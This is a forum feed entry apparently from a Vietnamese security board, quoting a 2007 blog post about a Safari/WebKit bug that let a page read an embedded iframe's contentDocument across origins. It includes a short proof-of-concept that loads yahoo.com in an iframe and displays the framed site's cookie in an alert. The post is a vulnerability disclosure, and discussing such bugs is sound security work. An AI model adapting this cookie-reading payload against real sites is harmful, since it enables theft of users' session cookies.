<![CDATA[Latest posts for the topic "XSS on Safari"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net XSS on Safari

http://xssinsafari.blogspot.com/2007/08/bug-in-safari-allows-xss-attacks-on.html wrote:
Bug in Safari allows XSS attacks on websites. Safari/Webkit allows "contentDocument" attribute of iframe's to be read from containing page.This can be used to get the cookie of the "iframe". The exploit does not work in other browsers. < iframe id="subfr" height="300" width="300" src="http://www.yahoo.com" > < /iframe > < script >setTimeout('later();', 2000); function later() { var subFrame = document.getElementById("subfr"); window.alert("your yahoo cookie is " + subFrame.contentDocument.cookie); } < /script > 
]]>
/hvaonline/posts/list/13083.html#77609 /hvaonline/posts/list/13083.html#77609 GMT